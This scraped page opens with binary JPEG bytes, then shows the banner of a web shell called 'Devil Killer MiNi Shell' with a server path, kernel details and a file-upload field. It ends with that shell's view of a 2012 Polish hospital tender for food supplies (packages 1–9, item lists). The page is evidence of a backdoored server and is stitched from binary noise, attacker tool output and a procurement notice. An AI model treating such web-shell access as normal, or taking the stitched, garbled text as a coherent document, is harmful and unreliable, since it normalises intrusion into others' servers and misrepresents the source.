JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120518/161190-N-2012.html

<p class="kh_header"><b>Sucha Beskidzka: Dostawa artykułów spożywczych 
określonych w pakietach 1 - 9.</b><br>
<b>Numer ogłoszenia: 161190 - 2012; data zamieszczenia: 18.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki  Zdrowotnej , ul. Szpitalna 22, 34-200 Sucha Beskidzka, woj. małopolskie, tel. (033) 872 31 11, faks (033) 872 31 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozsuchabeskidzka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych 
określonych w pakietach 1 - 9..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych określonych w załącznikach              1- 9 do SIWZ.
Pakiet nr 1- artykuły ogólnospożywcze
Pakiet nr 2- słodycze
Pakiet nr 3- napoje
Pakiet nr 4- żywność dla dzieci i niemowląt
Pakiet nr 5- jajka
Pakiet nr 6- drób
Pakiet nr 7- pieczarki
Pakiet nr 8- mięso i wędliny
Pakiet nr 9- pieczywo.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) posiadania wiedzy i doświadczenia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu stosownie do treści art. 22 ust.1 ustawy Pzp, że spełnia warunki dotyczące:
a) sytuacji ekonomicznej i finansowej</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zezwolenie organu nadzoru sanitarnego na transport żywności określonym środkiem transportu
	Do potwierdzenia odpowiednim dokumentem
Dostawca powinien mieć lub mieć podjęte działania wdrożenia systemu HACCP 
	Do potwierdzenia oświadczeniem</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień niniejszej umowy może być dokonana przez strony 
w formie pisemnej w drodze aneksu do niniejszej umowy, pod rygorem nieważności.
2.	Zmiany postanowień niniejszej umowy, są dopuszczalne wyłącznie w przypadku, gdy:
a)	nastąpiło obniżenie ceny jednostkowej asortymentu,
b)	nastąpila zmiana sposobu konfekcjonowania
c)	wprowadzony zostanie do sprzedaży przez wykonawcę produkt
     zmodyfikowany/ udoskonalony
d)	wystąpił przejściowy brak produktu z przyczyn leżacych po stronie producenta
     przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie
     gorszych od  produktu objętego umową.
    e)  zmiany stawki podatku VAT - związanej z przedmiotem umowy - w tym
         przypadku zmianie ulegnie kwota podatku VAT i cena brutto , cena netto
         pozostanie niezmienna, 
    f)   w przypadku zmiany stawki podatku VAT w ramach niniejszej umowy zmiana
         stawki następuje z dniem wejścia w życie aktu prawnego zmieniającego stawkę,
g)	zmiana cen producenta do 5% ceny jednostkowej - w tym przypadku wymagana jest pisemna informacja Dostawcy, z odpowiednim wyprzedzeniem, nie później niż 3 dni przed proponowana zmianą oraz zgoda Zamawiającego,
h)	zmiana cen producenta powyżej 10% ceny jednostkowej - w tym przypadku wymagana jest pisemna informacja Dostawcy, z odpowiednim wyprzedzeniem, nie później niż 3 dni przed proponowana zmianą, udokumentowanie jej zmiany przez producenta w postaci zaświadczenia oraz zgoda Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zozsuchabeskidzka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Pulicznych Zespołu Opieki Zdrowotej ul. Szpitalna 22, 34-200 Sucha Beskidzka , Blok B, IV piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2012 godzina 10:00, miejsce: Sekretariat Zespołu Opieki Zdrowotnej, Blok C, I piętro , ul. Szpitalna 22, 34-200 Sucha Beskidzka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są atykuły spożywcze wymienione w pakiecie nr 1
Aromaty do ciast 10 ml	szt	30
Barszcz biały a 65g	szt	800
Barszcz czerwony a 50g	szt	150
Bazylia a 8g	szt	30
Budyń bez cukru 60g	szt	700
Budyń z cukrem a 60g	szt	700
Bulion drobiowy a 10 szt 180g	op	500
Cukier a 1kg	kg	4900
Cukier puder a 0,5kg	kg	350
Cukier waniliowy a 30g	szt	1200
Cynamon a 20g	szt	300
Cytrynka do herbaty a 10g	szt	30
Galaretka a 79g	szt	550
Gałka muszkatałowa 15g	szt	50
Kakao 100g np.. Decomoreno	szt	250
Kakao 200g np.. Decomoreno	szt	30
Kasza gryczana a 1kg	kg	30
Kasza jęczmienna a 1kg	kg	1200
Kasza kukurydziana a 1 kg	kg	50
Kasza manna a 1kg	kg	3500
Kawa zbożowa 0,5 kg 	kg	1100
Herbata granulowana 100 g np.. Indyjska granulowana 	kg	160
Kisiel bez cukrua 40g	szt	200
Kisiel  z cukrem a 77g	szt	300
Kleik ryżowy a 200g	kg	50
Kminek a 20g	szt	200
Kokos a 100g	szt	150
Konserwa szynka polska a 135g	szt	80
Konserwa turystyczna a 135g	szt	80
Konserwa tyrolska a 135g	szt	80
Konserwy rybne a 125 (olej)	szt	250
Konserwy rybne a 125g (pomidor)	szt	250
Kwasek cytrynowy a 50g	szt	350
Liście laurowe a 5g	szt	220
Maga 1l	szt	1300
Majeranek a 20g	szt	150
Makaron a 0,5kg (gruby)	kg	1600
Makaron a 0,5kg (łazanka)	kg	600
Makaron a 0,5kg (nitki)	kg	600
Makaron spagetti a 0,5 kg	kg	30
Makaron zacierka 0,25kg	kg	150
Makaron bezglutenowy a 0,5 kg	kg	3
Mąka a 1kg	kg	5600
Mąka kukurydziana a 0,4kg	kg	30
Mąka ziemniaczana a 0,5kg	kg	100
Mąka ziemniaczana a 1kg	kg	700
Morela suszona 130g	szt	30
Ocet 0,45l	szt	600
Olej 0,9l	szt	850
Olej 3l	szt	700
Olej 5l	szt	50
Oregano 10g	szt	30
Papryka mielona a 20g	szt	300
Pasztet drobiowy a 130g	szt	300
Pasztet drobiowy a 160g	szt	3500
Pasztet drobiowy a 50g	szt	100
Pasztet drobiowy a 90g	szt	100
Pieczywo chrupkie a 250g np.. Wasa 	szt	20
Pieprz mielony a 20g	szt	1400
Płatki kukurydziane a 250g	kg	30
Płatki migdałowe 50g	szt	30
Płatki owsiane a 500g	kg	800
Posypka kakaowe 80g	szt	10
Proszek do pieczenia a 30g	szt	400
Przyprawa do kurczaka 40g	szt	200
Przyprawa do ryb 20g	szt	30
Przyprawa do grila 40g	szt	20
Przyprawa do karkówki 40g	szt	20
Przyprawa do ziemianków 40g	szt	20
Przyprawa do piernika a 25g 	szt 	80
Przyprwa goździki a 15g	szt	200
Przyprwa a 1000g np.. Kucharek 	kg	30
Przyprwa a 200g np.. Kucharek 	kg	300
Rodzynki a 100g	kg	60
Ryż a 1kg	kg	2300
Sezam 	kg	30
Soda a 80g	szt	80
Sól a 1kg	kg	2000
Suchary a 300g	szt	120
Suchary a 300g/ bez cukru	szt	120
Śliwka kalifornijska 100	szt	150
Śmietanka do kawy a 10g w płynie	szt	2500
Śmietanka w proszku  20g np. Śnieżka 	szt	100
Tarte ciasto a 250g	kg	120
Wafle ryżowe a 250g	szt	30
Ziele angielskie a 15g	szt	230
Żelatyna a 50g	szt	750
Goździki 20g	szt	200
Śmietana spray a 250ml 	szt	15
Zioła prowanalskie 10g	szt	100
Ananas a 420g	szt	220
Brzoskwinie a 850g	szt	250
Chrzan tarty 180g	szt	60
Dżem a 25g	szt	16000
Dżem a 260g	szt	350
Dżem a 300g	szt	350
Dżem a 900g	szt	200
Groszek konserwowy a 400g	szt	500
Ketchup a 1000g	szt	100
Ketchup a 500g	szt	300
Kompot wiśnia a 0,9l	szt	1300
Kururydza konserwowa a 400g	szt	180
Majonez a 250g jogurtowy	szt	50
Majonez a 250g np. Kielecki	szt	200
Majonez a 400g np.Winiary	szt	100
Majonez a 500g np. Kielecki	szt	500
Majonez a 700g np. Winiary	szt	30
Miód naturalny a 25g	szt	3500
Miód naturalny a 400g	szt	20
Miód sztuczny a 400g	szt	100
Musztarda a 180g	szt	900
Ogórki konserwowe 0,9l	szt	100
Papryka konserwowa a 0,7l	szt	30
Papryka konserwowa a 0,9l	szt	250
Papryka konserwowa a 370g	szt	30
Pasta pomidorowa 850g np.. Bażant 	szt	550
Pasta pomidorowa 4,5 kg np.. Bażant 	szt	30
Pasta pomidorowa 400g np. . Bażant 	szt	200
Pasta pomidorowa a 200g	szt	100
Pieczarki marynowane 300g	szt	20
Powidła 300g	szt	300
Przetwory Oliwki z papryką 240g	szt	20
Przetwory Oliwki zielone 240g	szt	30
Przetwory Oliwki zielone 100g	szt	20
Sos do spagetti 500g	szt	20
Szpraga konserwowa 370g	szt	30
Pikle a 200g 	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są słodycze wyminione w pakiecie nr 2:
 Mieszanka  czekoladowa 2,5kg np.. Wedlowska 	kg	10
Baton Chałwa wanilia 100g	szt	30
Baton Chałwa wanilia 50g	szt	50
Baton czekoladowy a 23,5 g np.. Milky-Way 	szt	70
Baton czekoladowy a 25g np.. Knopers	szt	50
Baton czekoladowy a 40g np.. Kit-Kat 	szt	50
Baton czekoladowy a 42g. Np.. Mars	szt	100
Baton czekoladowy a 43 g np.. Lion	szt	50
Baton czekoladowy a 51 g np.. Twix 	szt	100
Baton czekoladowy a 55g np..  Snikers	szt	100
Baton czekoladowy Ptasie mleczko a 56g 	szt	30
Batonik czekoladowy a 41g np.. 3 Bit 	szt	50
Batonik czekoladowy a 51g np.. 3 Bit XXL 	szt	50
Batonik czekoladowy a 53g np.. Kinder-Bueno 	szt	50
Biszkopty kwadratowe 120g np.. Petitki	szt	50
Biszkopty okrągłe a 100g	szt	150
Biszkopty podłużne 140g	szt	50
Biszkopty z pianką a 128g np.. Milka różne smaki 	szt 	30
Bombonierka   276g np.. Cherry Quenn	szt	20
Bombonierka  150g np..Rafaello	szt	20
Bombonierka  190g np..Złote Róże	szt	20
Bombonierka  200g np.. Baryłki	szt	20
Bombonierka  250g np.. Merci 	szt	20
Bombonierka  254g np.. Elegancja	szt	20
Bombonierka  324g np.. Amaretto	szt	20
Bombonierka  400g np.. Mleczko Alpejskie	szt	20
Bombonierka 500g np.. Michałki Zamkowe 	szt	20
Bombonierka a 210g np.. Malaga 	szt	10
Bombonierka a 268g	szt	20
Bombonierka a 430 g np.. Kasztanki	szt	20
Bombonierka Ptasie Mleczko 450g	szt	20
Chipsy a 30 g np.. Leysy 	szt	100
Chrupki kukurydziane a 100g	szt	100
Ciasteczka herbatniki a 150g np.. Hit	szt	50
Ciastka  100g np..Leibniz Minis	szt	50
Ciastka  maślane 180g	szt	40
Ciastka czekoladowe a 140g np.. Jeżyki 	szt	30
Ciastka czekoladowe a 147g np.. Delicje	szt	200
Ciastka deserowe z cukrem 185g	szt	40
Ciastka Herbatniki  100g np.. Petitki	szt	40
Ciastka herbatniki a 250g np.. Hit	szt	50
Ciastka Kokosowe 148g np.. Łakotki	szt	40
Ciastka kruche a 135g np.. Pieguski 	szt	40
Ciastka Pierniki  a 250g np.. Pierniki alpejskie	szt	50
Ciastka Pierniki  a 250g np.. Pierniki alpejskie	szt	40
Cukierki  100g np..Fruit Tella	szt	40
Cukierki  a 100g np..Hops	szt	30
Cukierki  a 90g np..Fantazje	szt	30
Cukierki  mleczne 150gnp. Krówki	szt	30
Cukierki 100g np.. Kukułki	szt	30
Cukierki draże a 70g	szt	50
Cukierki dropsy a 40g np.. Kopiko 	szt	20
Cukierki landrynki a 100g np.. Brando 	szt	30
Cukierki Landrynki a 150g	szt	50
Cukierki Landrynki a 90g np. Malinki Goplana	szt	30
Cukierki Landryny  90g np.Goplana	szt	30
Cukierki Mentos  38g np..Fruit	szt	30
Cukierki Mentos  38g np..Mint	szt	30
Cukierki miętowe 16g np..Tic-Tac	szt	100
Cukierki miętowe a 90g	szt	50
Cukierki żelki a 75g	szt	20
Czekolada  biała a 100g	szt	50
Czekolada a 100g np. Milka z orzechami 	szt	50
Czekolada a 100g np. Milka z rodzynkami 	szt	50
Czekolada a 100g np.. Milka kremowa 	szt	50
Czekolada a 100g np.. Milka z całymi orzechami 	szt	40
Czekolada a 200g np. Goplana 	szt	40
Czekolada a 250g np.. Milka z orzechami 	szt	40
Czekolada a 250g np. Milka 	szt	40
Czekolada gorzka a 100g	szt	200
Czekolada mleczna a 100g np. Goplana 	szt	40
Czekolada mleczna a 100g np. Milka 	szt	30
Czekolada mleczna a 100g np. Wedel 	szt	30
Czekolada mleczna a 200g	szt	30
Czekolada nadziewana truskawkowa a 100g	szt	20
Czekolada z bakaliami a 100g	szt	40
Czekoladki mleczne a 100g np.. Kinder	szt	40
Galaretka w czekoladzie 2,5kg	kg	10
Guma do żucia a 15g np.. Orbit	op	120
Guma rozpuszczalna a 4 np.. Mamba	szt	30
Herbata  exp. a 20szt x 2g np.. Tetli	op	30
Herbata  granulowana 100g np..Saga	kg	150
Herbata exp.  25szt x 2g np.. Lipton	op	50
Herbata exp.  40 np.. Minutka	szt	400
Herbata exp.  a 100szt np..Lipton	op	20
Herbata exp.  a 20szt np..Saga	op	30
Herbata exp.  a 50szt np.. Saga	op	30
Kawa  parzona a 250g np.. Jacobs Aromat	kg	5
Kawa  parzona a 250gnp. Ford	szt	20
Kawa  rozpuszcalna 3x18g np.. Maxwell	szt	30
Kawa Capucino a 15g	szt	200
Kawa Lavanzza a 250g mielona 	szt	8
Kawa Lavanzza a 250g ziarnista 	szt	192
Kawa parzona   a 100g np.. Tchibo	kg	20
Kawa parzona  a 100g np.. Ford	kg	15
Kawa parzona  a 100g np.. Prima 	kg	20
Kawa parzona  a 100g np.. Z kogutkiem 	kg	30
Kawa parzona  a 250g np.. Prima	kg	30
Kawa parzona  a 250g np.. Tchibo	kg	25
Kawa parzona  a 250g np.. Z kogutkiem	kg	30
